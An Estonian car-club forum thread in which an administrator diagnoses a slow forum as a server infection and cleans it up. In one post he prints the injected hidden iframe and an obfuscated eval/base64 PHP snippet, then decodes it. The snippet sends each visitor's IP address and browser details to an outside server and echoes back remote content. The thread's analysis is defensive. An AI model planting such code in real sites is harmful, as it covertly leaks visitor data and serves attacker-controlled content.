Teema hinnang:
  • 0Hääli - 0 keskmine
  • 1
  • 2
  • 3
  • 4
  • 5
Üldised foorumiga seonduvad küsimused/probleemid
#41
(31-10-2011, 02:15 PM)Laur Kirjutas: Foorum on kuidagi meeletult aeglaseks muutunud...
??

+1
Vasta
#42
Mulle tundub ka, et täna lehed laevad kole pikalt. Eelnevalt seda probleemi vist polnud või ei pannud seda ennem nii hästi tähele.
You can have any car you like... As long as it's a Mercedes!
Vasta
#43
Probleem on antud seisuga teadmata. Võtsin ühendust zoneiga ning Indrek lubas saata zonei raporti meie viiruste teemadel. Peale neid oskan veidi paremini öelda.

Seniks aga mõned faktid:
  1. Kasutame päevas 1.38 GiB bandwidthi
  2. Saame kuus 53,5k hitti
  3. Postituste arv on ammu üle 100k

Seega ärge väga imestage, kui miski aeglane on ^^
Vasta
#44
Ma vabandan. Vaatasin valet kohta, foorum.clubmb.ee'l on teine statistika ehk 6 655 536 hitti kuus ja 32 444 hitti TUNNIS!
Vasta
#45
Postituste arv ei tähenda midagi.
Loen aegajalt ühte teist foorumit mille postituste arv on: Foorumis on 84263 teemat • 479515 postitust • 16637 kasutajat.

Mercedes-Benz foorum: Meie kasutajad on teinud kokku 100,610 postitust 10,289 teemas.
M.O.T.T
If you want to make God laugh, tell him your future plans
Vasta
#46
Selles on sul õigus, aga hittide arv on väga väga kõrge. Teoorias peaksime me olema üks Eesti suurimaid portaale siis.

Igatahes, hetkel on selge et keegi ründab.

Isiklikult vaatan kasutajate ip'si. Kus mõned dünaamilised host-aadressid on hittinud meid üle 2000 korra. Ma kahtlen, et üks dyn host-aadress kestab üle hmm.. päeva? Seega see peab tõsine huviline olema.

Momendil ka kaldun arvama, et probleemi allikaks on vene foorum. Need kahtlased hittid pärinevad ka sealt. Hetkel ootan Indreku raportit, zone OFC pole midagi vastanud. Seega eks näis.. Kasutajat sellised asjad ohustatada ei tohiks, lihtsalt käivad pinda.
Vasta
#47
Ok raport käes. Serveris on tehniliselt viirused, kuid kasutajat ei ohusta. Need on pageranki mõjutamiseks mõeldud iframeid, millega on mul kogemusi olnud. Paraku muidugi on failide maht suhteliselt suur, seega puhastus töö saab olema eepiline!
Vasta
#48
Nii, asjad on tegemises. Paraku on failide kogus nii suur, et võtab aega.

Anyways, see on otsenene viiruse leht:
Kood:
http:// 195.2.252.137/ ftp.php
ma panin spaceid vahele, kui keegi proovida tahab..
Ideeliselt ta sulle midagi ei tee, seega julgemad võivad proovida. See leht timeoutib täpselt sama kaua, kuni clubmb.ee lehed laevad..

Puhastamine võtab aega, loodab et zone saab asja automaatselt teha. See seletab ka ära, miks kusagil lehel on mingi alarm hakanud kisama. Ehk clubmb.ee üldise domeenina on kusagil nimekirjas, kui "bad site". See peaks kaduma automaatselt, kui probleem on kõrvaldatud ja kindlasti võtame suurimate lehekülgedega ise ühendust.
Vasta
#49
Nii. Pildipark on korras!

Avastasin uue probleemi, kuid endiselt kinnitan et tava kasutaja jaoks ei ole tähtsust. Sest, need leheküljed on ammu maha võetud, kuigi viirus levib edasi. Mis tähendab, et mingi programm üritab ja üritab seda lehte leida.. seega on leht aeglane ja siis tuleb timeout.
Vasta
#50
B1 Otsing peaks puhas olema ja tundub et suurem osa foorumist on ka puhas.
Vasta
#51
Foorum on 100% puhas ja korras nüüd. Nagu näha siis laeb korralikult.

Vene foorumil tegin põhifailidele kontrolli ja puhastasin nad ära. Tundub et laeb normaalselt.

Detailsema puhastuse teen õhtul, kui istun veidi kiirema neti taga.. Kuid tähtsamad kohad on puhtad, nii et..
Vasta
#52
Toimib kenasti jah, suured tänud
" The Best Or Nothing"  Mercedes-Benz

Indrek Peets
Mercedes-Benz Eesti klubi juhatuse liige
indrek@clubmb.ee / 5121868
Vasta
#53
Lippab kenasti küll. Tänud, viiruseloomade tagaajamine võib päris huvitav ülesanne olla...
Vasta
#54
Hetkel küll on veel 300 + 600 (~ arvud) faili vaja puhastada, kuid pole võimalik siit teha. Foorum küll on kindlasti korras, koos tähtsamate juurtega.

Viirustest veidi lähemalt. Viirus jõudis serverisse kellegi arvuti kaudu ehk kellegi FTP programm sai trooja. See käis kõik saidid üle ning bamm bamm lisas iframei html failidesse:
PHP Kood:
<?php 
<iframe src='http://195.2.252.137/ftp.php' width='1' height='1' style='visibility: hidden;'></iframe>
ja php failidesse:
PHP Kood:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
eval(
base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

Teeme asja puhtamaks ja decodime:

PHP Kood:
<?php 
$_F
= __FILE__;
$_X = '?><?php $3rl = \'http://96.69e.a6e.o0/bt.php\'; ?>';
$_X = strtr($_X, '123456aouie','aouie123456');
$_R = ereg_replace('__FILE__',"'" . $_F . "'", $_X);
$_R = 0;
$_X = 0;
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url . '?ip=' . $ip . '&host=' . $host . '&uri=' . $uri . '&ua=' . $ua . '&ref='. $ref;
$tmp = file_get_contents($url);
echo
$tmp;

See eval(base64_decode()); on veits lame, kuid päris kaval. Ehk, mõte on selles, et base64 teeb silmale keeruliseks mingi stringi ning eval() jooksutab selle.. Ehk näiteks ZWNobyAnS2FsbGUgb24gbGFoZSEnOw== --> echo 'Kalle on lahe!'; Ja kuigi peale base64_decode()'i oleks tegemist lihtsalt stringi, siis eval('echo 'Kalle on lahe!';') --> Kalle on lahe!. Ehk pm nad maskisid mingi möga ära. Siis lisasid selle rea alati peale ?> lõppu ning jõhkra spaceiga.. nii et ilma wordwrapita sa ei näeks sedaBig Grin Noh, suht kaval, kuid nad ei arvestanud sellega, et nende emalaev ehk server tõmmatakse rajalt maha.. Mis tähendab, et jah.. tõesti uhke töö.. kuid vägagi mõttetu.

Kogu asja mõte oli selles, et lisada mingi fail lehekülje lõppu. Mis teeks mingi pildi või lehekülje pageranki suuremaks.. Ehk pagerank scam = internet marketing. Realselt ohtu tavakasutajal ei olnud.

Ja kui kedagi huvitab, et kes selle taga on siis: http://en.utrace.de/ip-address/195.2.252.137
Vasta
#55
Vene foorumi kaudu ta ka sisse sai, kui kunagi selle meie serverisse tagasi tõstsime
" The Best Or Nothing"  Mercedes-Benz

Indrek Peets
Mercedes-Benz Eesti klubi juhatuse liige
indrek@clubmb.ee / 5121868
Vasta
#56
Väga tubli töö taas!

Ei mäleta, et lehed olex selles foorumis kunagi nii kiiresti avanenud. Praktiliselt silmapilkselt, ei mingit laadeaega.
You can have any car you like... As long as it's a Mercedes!
Vasta
#57
Kui nett aeglane või mingi cellular device, siis: http://foorum.clubmb.ee/archive/index.php peaks veelgi kiirem olema, kahjus küll ei saa sealt vastata Sad
Vasta
#58
Kas selle taga olid siis samad vennad tartust,kes nyyd suure k6muga kinni pandi¿
?
Vasta
#59
Ei oska kommenteerida. Kuid tegemist oli internatsionaalse rünnakuga. Ning catch-server oli Moskvas.
Vasta
#60
Ok väikese kommentaari võin teha küll. Pm ei usu, et antud juhul oli tegemist samade inimestega, kuid meetod on täpselt sama. Eestlaste roll oli lihtsalt näha võimalust ja kasutasid seda. Muidugi, muljetavaldav oli näha "marketing" lehekülge sellist jama ajamas.. See jutt, et kodulehele pole võimalik väljast ligi pääseda ning need kodulehed teadlikult seda koodi seal hoidsid, on muidugi vale. Antud skeem käis läbi puhta häkkimise ning viiruste kaudu.

Tegelen isegi SEO parandamisega, kuid selline meetod on vägagi ebaeetiline.
Vasta


Võimalikud seotud teemad...
Teema: Autor Vastuseid: Vaatamisi: Viimane postitus
  Probleemid seoses foorumiga indrek 64 78,871 06-09-2011, 12:00 AM
Viimane postitus: Harry



Kasutaja, kes vaatavad seda teemat: 12 külali(st)ne